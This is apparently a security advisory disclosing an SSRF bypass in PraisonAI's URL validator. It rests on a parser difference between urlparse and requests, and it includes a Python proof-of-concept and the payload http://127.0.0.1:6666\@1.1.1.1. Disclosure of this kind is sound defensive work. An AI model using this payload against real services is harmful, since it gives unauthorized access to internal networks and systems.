The URL validation logic in PraisonAI has a logical flaw that attackers can bypass, leading to SSRF.
PraisonAI currently validates input URLs with validateurl. It extracts the host portion of the URL with urlparse and runs security checks on that host to prevent SSRF.
<img width="1290" height="1145" alt="QQ20260424-151256-24-1" src="https://github.com/user-attachments/assets/d5f16b74-5ad2-444f-8600-b05f78a4b769" />
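A host check of this kind can be sketched roughly as follows. This is a minimal illustration and not PraisonAI's actual implementation: the function name `host_looks_internal` is hypothetical, only IP-literal hosts are handled, and DNS resolution of hostnames is left out.

```python
import ipaddress
from urllib.parse import urlparse


def host_looks_internal(url: str) -> bool:
    """Return True if the host that urlparse extracts is a non-public IP literal.

    Hypothetical helper for illustration only; a real check would also
    resolve hostnames and inspect every resolved address.
    """
    host = urlparse(url).hostname
    if host is None:
        return True  # no host at all: treat as unsafe
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # not an IP literal; resolution is out of scope here
    return ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved


print(host_looks_internal("http://127.0.0.1:6666/"))  # True (loopback)
print(host_looks_internal("http://1.1.1.1/"))         # False (public)
```

The important detail is that the decision depends entirely on what urlparse reports as the hostname, so it is only sound if the HTTP client later agrees on that hostname.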
However, urlparse and the library that actually sends the request parse URLs differently. In almost every code path in this project, the URL is first validated with validateurl and then fetched with getsession().get.
<img width="1143" height="740" alt="QQ20260424-151437-24-2" src="https://github.com/user-attachments/assets/b1bf6ec2-d32a-4dac-b814-da819e8d3c83" />
Under the hood, that call goes through requests.get.
<img width="1042" height="576" alt="QQ20260424-151645-24-3" src="https://github.com/user-attachments/assets/e17352c3-4205-44d6-ab6e-75566480215b" />
The core issue: urlparse() and requests disagree on which host a URL like http://127.0.0.1:6666\@1.1.1.1 points to:
- urlparse() treats \ as a regular character and @ as the userinfo-host delimiter, so it extracts the hostname as 1.1.1.1 (public).
- requests treats \ as a path character, so it connects to 127.0.0.1 (internal).

Below is the test script I wrote, based on the project's code.
```python
import sys
from pathlib import Path
from pprint import pprint

# Make the local PraisonAI checkout importable (path is specific to the test machine).
sys.path.insert(0, str(Path(r"D:/BaiduNetdiskDownload/PraisonAI-main/PraisonAI-main/src/praisonai-agents")))

from praisonaiagents.tools import spider_tools

# Bypass payload; a raw string keeps the backslash literal.
# url = r"http://127.0.0.1:6666\@1.1.1.1"
# Baseline: a plain internal address.
url = "http://127.0.0.1:6666"

result = spider_tools.scrape_page(url)
if isinstance(result, dict) and "error" in result:
    print("scrape failed:", result["error"])
else:
    pprint(result)
```
When an attacker uses http://127.0.0.1:6666/, the existing check recognizes it as an internal network address and blocks it.
<img width="1068" height="128" alt="QQ20260424-152007-24-4" src="https://github.com/user-attachments/assets/294bff10-2af6-4960-bf69-dbf3340b1e9b" />
However, when an attacker uses http://127.0.0.1:6666\@1.1.1.1, the detection logic resolves the host to 1.1.1.1, a public IP address, so the URL passes validation. When the request is actually sent, requests.get connects to http://127.0.0.1:6666, which bypasses the check and achieves SSRF.
<img width="2089" height="324" alt="QQ20260424-152123-24-5" src="https://github.com/user-attachments/assets/4421ce42-e47b-48de-a97a-56ce56a2bbc9" />
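The disagreement between the two parsers can be reproduced with the standard library alone. The sketch below is an illustration under stated assumptions: `host_seen_by_client` is a hypothetical stand-in that models a client whose authority component ends at the first `/`, `\`, `?` or `#`, which is the behavior described above for requests. It does not call requests itself, and it ignores IPv6 bracket syntax.

```python
import re
from typing import Optional
from urllib.parse import urlparse

# Assumption: the client ends the authority at the first "/", "\", "?" or "#".
_AUTHORITY_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.-]*://([^\\/?#]*)")

PAYLOAD = r"http://127.0.0.1:6666\@1.1.1.1"


def host_seen_by_validator(url: str) -> Optional[str]:
    """Host as extracted by urlparse, which splits userinfo at the last '@'."""
    return urlparse(url).hostname


def host_seen_by_client(url: str) -> Optional[str]:
    """Host under the assumed client model (hypothetical helper, no IPv6)."""
    match = _AUTHORITY_RE.match(url)
    if match is None:
        return None
    host_port = match.group(1).rpartition("@")[2]  # drop any userinfo
    host = host_port.rsplit(":", 1)[0] if ":" in host_port else host_port
    return host.lower() or None


def parsers_disagree(url: str) -> bool:
    """True when the validated host differs from the host that gets contacted."""
    return host_seen_by_validator(url) != host_seen_by_client(url)


print(host_seen_by_validator(PAYLOAD))  # 1.1.1.1
print(host_seen_by_client(PAYLOAD))     # 127.0.0.1
print(parsers_disagree(PAYLOAD))        # True
```

A check like `parsers_disagree` is only a diagnostic aid here. If urllib3 is installed, its `urllib3.util.parse_url` function could be substituted for the modelled client to compare against the parser that requests relies on.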
http://127.0.0.1:6666\@1.1.1.1
SSRF
{
  "github_reviewed_at": "2026-05-06T22:08:11Z",
  "github_reviewed": true,
  "cwe_ids": [
    "CWE-918"
  ],
  "nvd_published_at": "2026-05-08T14:16:46Z",
  "severity": "HIGH"
}